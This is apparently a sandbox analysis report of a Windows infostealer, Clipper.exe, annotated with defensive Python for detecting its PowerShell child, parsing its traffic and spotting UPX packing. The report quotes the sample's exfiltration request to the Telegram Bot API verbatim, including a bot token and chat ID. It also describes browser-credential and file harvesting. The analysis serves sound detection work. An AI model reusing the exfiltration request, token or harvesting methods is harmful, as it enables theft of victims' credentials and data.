
Windows Analysis Report
Clipper.exe

Overview

General Information

Sample name: Clipper.exe
Analysis ID: 1450354
MD5: a0a3146b324c02ed258e040e035bcec2
SHA1: 4635d5ddba61b0e4ab04549b28c854f4193de364
SHA256: d6fa02a17eb8e18ae484e4af8462eb4362b1ab883e48a6a5c03c265dd867bf6f
Tags: exe

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

  • System is w10x64
  • Clipper.exe (PID: 5444 cmdline: "C:\Users\user\Desktop\Clipper.exe" MD5: A0A3146B324C02ED258E040E035BCEC2)
    • powershell.exe (PID: 4112 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: (same as Command), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Clipper.exe", ParentImage: C:\Users\user\Desktop\Clipper.exe, ParentProcessId: 5444, ParentProcessName: Clipper.exe, ProcessCommandLine: (same as Command), ProcessId: 4112, ProcessName: powershell.exe
No Snort rule has matched
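The rule match recorded above (author fields in the Sigma rule convention) fires on non-interactive PowerShell started by a parent that is not a shell or the desktop. The following is an added example of that detection logic, written for this page; it is my own simplified rule, not the Roberto Rodriguez / oscd.community rule the sandbox matched (whose body is not printed here) and not code from the report. The first event is built from the report's process-tree fields, the second is a constructed benign event, and EXPECTED_PARENTS is my own allow-list.

```python
"""Process-creation check for the PowerShell child in the report's process tree.

Added example, my own simplified detection logic; not the rule credited to
Roberto Rodriguez / oscd.community that the report matched. CLIPPER_CHILD is
built from the report's fields; INTERACTIVE_SHELL is constructed for contrast;
EXPECTED_PARENTS is an assumed allow-list.
"""
import re

POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")

# Parents from which an operator-driven PowerShell is expected (assumed allow-list).
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe",
                    "powershell.exe", "pwsh.exe", "powershell_ise.exe", "code.exe"}


def powershell_flags(cmdline):
    """Normalise powershell.exe switches, honouring the unique-prefix forms
    PowerShell accepts (-noni, -nop, -nol, -w, -c, -ec, -en...)."""
    flags = set()
    for tok in re.findall(r'"[^"]*"|\S+', cmdline):
        t = tok.lower()
        if not t.startswith("-"):
            continue
        if t.startswith("-non"):
            flags.add("NonInteractive")
        elif t.startswith("-nop"):
            flags.add("NoProfile")
        elif t.startswith("-nol"):
            flags.add("NoLogo")
        elif t.startswith("-w"):
            flags.add("WindowStyle")
        elif t in ("-e", "-ec") or t.startswith("-en"):
            flags.add("EncodedCommand")
        elif t.startswith("-c"):
            flags.add("Command")
    return flags


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the reasons a process-creation event looks like scripted,
    non-interactive PowerShell from an unexpected parent ([] means benign)."""
    if not event["Image"].lower().endswith(POWERSHELL_IMAGES):
        return []
    flags = powershell_flags(event["CommandLine"])
    parent = basename(event["ParentImage"])
    reasons = []
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"spawned by {parent}")
    if "NonInteractive" in flags:
        reasons.append("-NonInteractive")
    if {"NoProfile", "NoLogo"} <= flags and flags & {"Command", "EncodedCommand"}:
        reasons.append("one-shot -NoProfile -NoLogo with inline command")
    return reasons


# Built from the report's process-tree / rule-match fields.
CLIPPER_CHILD = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": ('"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command '
                    '"[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; '
                    'Get-Culture | Select -ExpandProperty DisplayName"'),
    "ParentImage": r"C:\Users\user\Desktop\Clipper.exe",
    "ParentProcessId": 5444,
    "ProcessId": 4112,
}
# Constructed benign event: a user opening PowerShell from the desktop.
INTERACTIVE_SHELL = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
    "ParentImage": r"C:\Windows\explorer.exe",
    "ParentProcessId": 1234,
    "ProcessId": 5678,
}

if __name__ == "__main__":
    for ev in (CLIPPER_CHILD, INTERACTIVE_SHELL):
        print(ev["ProcessId"], evaluate(ev) or "benign")
```

The one-liner itself is harmless (it prints the display name of the current culture); in this sample it exists only to populate the "Current Language: English (United States)" field that later appears in the Telegram caption, so the parent/child relationship, not the command text, is the signal worth alerting on.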


AV Detection

Source: Clipper.exe | ReversingLabs: Detection: 54%
Source: Clipper.exe | Virustotal: Detection: 45%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 92.2% probability
Source: Clipper.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: Clipper.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\
Source: C:\Users\user\Desktop\Clipper.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: unknown | DNS query: name: ipwho.is
Source: global traffic | DNS traffic detected: DNS query: ipwho.is
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /?output=json HTTP/1.1 | accept: */* | host: ipwho.is
Source: global traffic | HTTP traffic detected: POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%209U6K4TPK4%20(1280,%201024)%0AHWID:%208938522624742244%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Clipper.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1 | content-type: multipart/form-data; boundary=06ec5f61112c6801-34e39273c27dba2c-829713dddb1cab64-cc80a85d9fadfaa4 | content-length: 978765 | accept: */* | host: api.telegram.org
Decoded caption of the POST above (URL-decoded; neither request carries a User-Agent header, which is the "HTTP GET or POST without a user agent" signature):

- IP Info -

IP: 173.254.250.91
Country: United States
City: Dallas
Postal: 75201
ISP: Quadranet Enterprises LLC - A8100
Timezone: -05:00

- PC Info -

Username: user
OS: Microsoft Windows 10 Pro
CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz
GPU:
    - 9U6K4TPK4 (1280, 1024)
HWID: 8938522624742244
Current Language: English (United States)
FileLocation: C:\Users\user\Desktop\Clipper.exe
Is Elevated: true

- Other Info -

Antivirus:
    - Windows Defender

- Log Info -


Build:_____

Passwords: ❌
Cookies: ✅ 2
Wallets: ❌
Files: ✅ 40
Credit Cards: ❌
Servers FTP/SSH: ❌
Discord Tokens: ❌
Others: ❌

Note: the IP block is what ipwho.is returned for the sandbox's own egress address (173.254.250.91, Quadranet, Dallas), so it is not an indicator; the indicators are the bot token 6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA, the chat_id -4003506161 (negative, i.e. a Telegram group) and the 978,765-byte multipart upload that follows the ipwho.is precheck. 149.154.167.220 is Telegram's API front end (ASN TELEGRAMRU) and is shared with every legitimate Bot API client, so the "IP address / Internet Provider / JA3 seen in connection with other malware" hits add little on their own. 1.1.1.1 is a public DNS resolver, so the two UDP flows to it are most likely the lookups themselves rather than a second channel.
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 195.201.57.90
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Note: the ecosia / duckduckgo / yahoo / google URLs are the built-in search-provider entries of a Chromium profile and sit in the sample's memory because it read the browser database; none of them was contacted during the analysis.
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
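Decoding the two requests above, as an added example (my own code, written for this page; not part of the Joe Sandbox report and not the sample's or Telegram's code): the Bot API path carries the operator's bot token, the query string carries the chat_id and a URL-encoded summary of what was stolen, and both requests lack a User-Agent header. The request lines and headers are transcribed from the report (the caption is abridged to the fields used); IP_LOOKUP_HOSTS, the tag names and the function names are my assumptions.

```python
"""Triage helper for the two HTTP requests in this report: the ipwho.is lookup
and the Telegram Bot API upload carrying the stolen data.

Added example, my own code; not from the Joe Sandbox report, the sample or any
vendor tool. Request lines/headers are transcribed from the report (caption
abridged); IP_LOOKUP_HOSTS, tag names and function names are mine.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Bot API URLs embed the credential: /bot<bot_id>:<secret>/<method>
BOT_PATH = re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$")
# "Item: ✅ 12" / "Item: ❌" lines of the stealer's caption
LOOT_LINE = re.compile(r"^(?P<item>[A-Za-z][A-Za-z /]*?):\s*(?P<flag>\u2705|\u274c)\s*(?P<count>\d+)?\s*$")
IP_LOOKUP_HOSTS = {"ipwho.is"}   # from the report; extend with other geo-IP services (assumption)


def parse_request_line(request_line):
    method, target, version = request_line.split(" ", 2)
    return method, target, version


def parse_loot_summary(caption):
    """Map the caption's per-category lines to counts (0 = nothing stolen)."""
    loot = {}
    for line in caption.splitlines():
        m = LOOT_LINE.match(line.strip())
        if m:
            loot[m.group("item")] = 0 if m.group("flag") == "\u274c" else int(m.group("count") or 1)
    return loot


def parse_telegram_exfil(request_line, headers):
    """Extract bot token, chat id, upload size and loot summary from a Bot API call;
    returns None for anything that is not a Bot API request."""
    method, target, _ = parse_request_line(request_line)
    hdr = {k.lower(): v for k, v in headers.items()}
    url = urlsplit(target)
    m = BOT_PATH.match(url.path)
    if hdr.get("host") != "api.telegram.org" or not m:
        return None
    query = parse_qs(url.query)
    return {
        "method": method,
        "api_method": m.group("method"),
        "bot_id": m.group("token").split(":")[0],
        "bot_token": m.group("token"),
        "chat_id": query.get("chat_id", [None])[0],
        "upload_bytes": int(hdr.get("content-length", "0")),
        "user_agent_present": "user-agent" in hdr,
        "loot": parse_loot_summary(query.get("caption", [""])[0]),
    }


def tag_request(request_line, headers):
    """Tags a proxy/NDR rule would raise on the report's two requests."""
    hdr = {k.lower(): v for k, v in headers.items()}
    _, target, _ = parse_request_line(request_line)
    tags = set()
    if "user-agent" not in hdr:
        tags.add("no-user-agent")
    if hdr.get("host") == "api.telegram.org" and BOT_PATH.match(urlsplit(target).path):
        tags.add("telegram-bot-api")
    if hdr.get("host") in IP_LOOKUP_HOSTS:
        tags.add("external-ip-lookup")
    return tags


# Transcribed from the report (caption abridged to the fields used below).
GEO_GET = "GET /?output=json HTTP/1.1"
GEO_HEADERS = {"accept": "*/*", "host": "ipwho.is"}
EXFIL_POST = (
    "POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument"
    "?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91"
    "%0ACountry:%20United%20States%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user"
    "%0AIs%20Elevated:%20true%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C"
    "%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040"
    "%0ACredit%20Cards:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1"
)
EXFIL_HEADERS = {
    "content-type": "multipart/form-data; boundary=06ec5f61112c6801-34e39273c27dba2c-829713dddb1cab64-cc80a85d9fadfaa4",
    "content-length": "978765",
    "accept": "*/*",
    "host": "api.telegram.org",
}

if __name__ == "__main__":
    print(sorted(tag_request(GEO_GET, GEO_HEADERS)))
    print(parse_telegram_exfil(EXFIL_POST, EXFIL_HEADERS))
```

The bot token is the operator's credential and the item to report to Telegram; the negative chat_id identifies a group rather than a private chat. For blocking, keying on host api.telegram.org plus a /bot<digits>:<secret>/ path from a non-browser process is more precise than blocking the host outright, since the same front end serves legitimate bots.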
Source: classification engine | Classification label: mal76.troj.spyw.evad.winEXE@4/14@2/2
Source: C:\Users\user\Desktop\Clipper.exe | File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
Source: C:\Users\user\Desktop\Clipper.exe | File created: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\
Source: C:\Users\user\Desktop\Clipper.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\Clipper.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Clipper.exe, 00000000.00000003.2048455422.000001A2EA119000.00000004.00000020.00020000.00000000.sdmp, Clipper.exe, 00000000.00000003.2046723501.000001A2EA112000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Note: the password_notes schema is that of Chrome's "Login Data" SQLite database; Login Data.0.dr is the sample's dropped copy of it, and the randomly named directory under %TEMP% is the likely staging location for the harvested files before the multipart upload to api.telegram.org.
Source: unknown | Process created: C:\Users\user\Desktop\Clipper.exe "C:\Users\user\Desktop\Clipper.exe"
Source: C:\Users\user\Desktop\Clipper.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Note: the PowerShell one-liner only returns the display name of the current culture; its output is the "Current Language: English (United States)" field of the Telegram caption.
Source: C:\Users\user\Desktop\Clipper.exe | Sections loaded: apphelp.dll, rstrtmgr.dll, secur32.dll, ncrypt.dll, sspicli.dll, ntasn1.dll, cryptbase.dll, kernel.appcore.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, ntmarta.dll, dpapi.dll, schannel.dll, mskeyprotect.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, gpapi.dll, cryptnet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
Note: the Clipper.exe load set is consistent with the observed behaviour: rstrtmgr.dll (Restart Manager, commonly used by stealers to release locks on open browser databases), dpapi.dll (DPAPI, needed to decrypt Chrome's stored key), wbemcomn.dll (WMI client for the Win32_* queries) and schannel.dll / ncryptsslp.dll (the TLS 1.2 session to api.telegram.org).
Source: C:\Users\user\Desktop\Clipper.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 (CLSID_WbemLocator, the WMI client entry point used for the Win32_* queries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Clipper.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: Clipper.exe | Static file information: File size 2269184 > 1048576
Source: Clipper.exe | Static PE information: Raw size of UPX1 (0x229600) exceeds 0x100000
Source: Clipper.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Clipper.exe | Static PE information: section name: UPX2
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Note: UPX0/UPX1/UPX2 are the section names UPX leaves in place, and UPX1 alone accounts for 2,266,624 of the file's 2,269,184 bytes, so the sample is UPX-packed; unpack it (upx -d, or a memory dump taken after the stub has run if the headers were tampered with) before doing string or import analysis. The 0x140000000 image base is the linker default for x64 executables and carries no weight on its own.
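The static findings above (UPX0/UPX1/UPX2 section names, a UPX1 raw size of 0x229600 in a 2,269,184-byte file, image base 0x140000000 and the four DllCharacteristics flags) can be reproduced with a small section-table parser. This is an added example written for this page, my own code rather than the report's, the sample's or pefile's; the PE it parses is constructed inside the block, using the report's values where they are given and assumed values (UPX0/UPX2 sizes, RVAs, entry point) elsewhere.

```python
"""Section-table parser that reproduces the report's static PE findings.

Added example, my own code; not from the report, the sample or pefile. The
sample PE is constructed (headers only): values stated in the report are used
where given, the rest (UPX0/UPX2 sizes, RVAs, entry point) are assumed.
"""
import struct

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x1000: "APPCONTAINER",
    0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
STANDARD_SECTION_NAMES = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata",
                          ".rsrc", ".reloc", ".bss", ".tls", ".CRT", ".gfids"}


def decode_dll_characteristics(value):
    return [name for bit, name in DLL_CHARACTERISTICS.items() if value & bit]


def parse_pe(data):
    """Read the COFF/optional headers and the section table (PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:                                  # PE32+
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    elif magic == 0x10B:                                # PE32
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in PE32 and PE32+
    sections, off = [], opt + opt_size
    for _ in range(n_sections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "rva": va, "raw_size": raw_size,
                         "raw_ptr": raw_ptr, "characteristics": chars})
        off += 40
    return {"image_base": image_base, "entry_rva": entry_rva,
            "dll_characteristics": dll_chars, "sections": sections}


def packer_indicators(pe, file_size):
    """The checks behind the report's 'non-standard section names' and
    'raw size of UPX1' findings, plus which section holds the entry point."""
    names = [s["name"] for s in pe["sections"]]
    largest = max(pe["sections"], key=lambda s: s["raw_size"])
    entry = next((s["name"] for s in pe["sections"]
                  if s["rva"] <= pe["entry_rva"] < s["rva"] + max(s["virtual_size"], s["raw_size"])),
                 None)
    return {
        "upx_sections": [n for n in names if n.upper().startswith("UPX")],
        "nonstandard_sections": [n for n in names if n not in STANDARD_SECTION_NAMES],
        "largest_section": largest["name"],
        "largest_raw_share": round(largest["raw_size"] / file_size, 4),
        "entry_section": entry,
        "image_base": hex(pe["image_base"]),
        "dll_characteristics": decode_dll_characteristics(pe["dll_characteristics"]),
    }


def build_headers_only_pe(sections, image_base, dll_chars, entry_rva):
    """Emit DOS header, PE signature, COFF header, PE32+ optional header and
    section table, with no section data (enough for the parser above)."""
    e_lfanew, opt_size = 0x40, 240
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<Q", opt, 24, image_base)
    struct.pack_into("<H", opt, 70, dll_chars)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"), vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, vs, va, rs, rp, ch in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


# Constructed sample: UPX1 raw size and file size from the report, everything else assumed.
CLIPPER_FILE_SIZE = 2269184
CLIPPER_LIKE = build_headers_only_pe(
    sections=[("UPX0", 0x1AA000, 0x001000, 0x000000, 0x000400, 0xE0000080),
              ("UPX1", 0x22A000, 0x1AB000, 0x229600, 0x000400, 0xE0000040),
              ("UPX2", 0x001000, 0x3D5000, 0x000400, 0x229A00, 0xC0000040)],
    image_base=0x140000000, dll_chars=0x0020 | 0x0040 | 0x0100 | 0x8000, entry_rva=0x3D3000)

if __name__ == "__main__":
    print(packer_indicators(parse_pe(CLIPPER_LIKE), CLIPPER_FILE_SIZE))
```

Run against a real file by replacing CLIPPER_LIKE with the file's bytes and CLIPPER_FILE_SIZE with its length; a largest_raw_share close to 1.0 in a section named UPX1 that also contains the entry point is the packed-by-UPX pattern the report is flagging.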
Source: C:\Users\user\Desktop\Clipper.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (74 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2871
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2867
Source: C:\Users\user\Desktop\Clipper.exe TID: 3812 | Thread sleep time: -35000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6300 | Thread sleep count: 2871 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640 | Thread sleep count: 2867 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1972 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\Desktop\Clipper.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\Desktop\Clipper.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\Clipper.exe | Thread delayed: delay time: 35000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Note: 922337203685477 is TimeSpan.MaxValue expressed in milliseconds ((2^63 - 1) ticks / 10,000), i.e. an infinite wait inside the .NET PowerShell host, and 2767011611056431 is three of them summed. The "Contains long sleeps (>= 3 min)" and "high number of Window / User specific system calls" hits therefore come from powershell.exe's own plumbing; the only delay attributable to Clipper.exe is the 35,000 ms (35 s) sleep on TID 3812. The sample's actual VM/sandbox fingerprinting is the pair of WMI queries (Win32_BaseBoard serial number, Win32_Processor name) alongside the Win32_Bios query noted in the signature list.
